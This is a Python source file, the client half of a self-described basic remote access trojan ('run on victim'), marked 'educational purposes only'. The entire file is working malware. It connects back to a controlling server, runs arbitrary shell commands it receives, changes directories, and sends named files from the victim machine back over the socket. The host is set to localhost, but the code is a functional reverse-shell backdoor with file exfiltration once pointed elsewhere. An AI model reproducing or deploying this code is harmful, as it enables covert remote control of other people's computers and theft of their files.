# client software for my very basic python RAT
# client = run on victim
# by cayden wright
# educational purposes only
# 3 January 2023

import socket
import os
import subprocess

HOST = "127.0.0.1"  # The server's hostname or IP address
PORT = 1234  # The port used by the server
ENCODING = 'utf-8'

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((HOST, PORT))
    # send current working directory
    working_directory = os.getcwd()
    s.sendall(working_directory.encode(ENCODING))
    while True:
        # get command to run
        command_to_run = s.recv(1024).decode(ENCODING)
        # special commands
        if command_to_run[:9] == "rat_snake":
            # stop client
            if command_to_run[10:21] == "stop_client":
                response = "special:client_stopped"
                s.sendall(response.encode(ENCODING))
                exit()
            # send file
            #rat_snake send_file
            if command_to_run[10:19] == "send_file":
                print("file send command detected")
                filename = command_to_run [20:]
                if os.path.exists(filename):
                    #prep server for recieving
                    s.sendall(f"special:recieve_file {filename}".encode(ENCODING))
                    print("prepped server for recieving")
                    #open file and send in 1024 byte increments
                    with open(filename, "rb") as file:
                        print("opened file")
                        buffer = file.read(1024)
                        print("got initial buffer")
                        while buffer:
                            s.send(buffer)
                            print("sent buffer to server")
                            buffer = file.read(1024)
                            print("read file to buffer")
                    response = "file transfer complete."
                else:
                    response = "file does not exist."
            # unknown special command
            else:
                response = "unknown special command."
        # cd case (change directory and send back cwd)
        elif command_to_run[:2] == 'cd':
            try:
                os.chdir(command_to_run[3:])
                response = os.getcwd()
            except FileNotFoundError as error:
                response = str(error)
        else:
            # else just run the command as normal
            response = subprocess.getoutput(command_to_run)

        # send response generated by above if/else block
        s.sendall(response.encode(ENCODING))

        # and then send current working directory
        working_directory = os.getcwd()
        s.sendall(working_directory.encode(ENCODING))
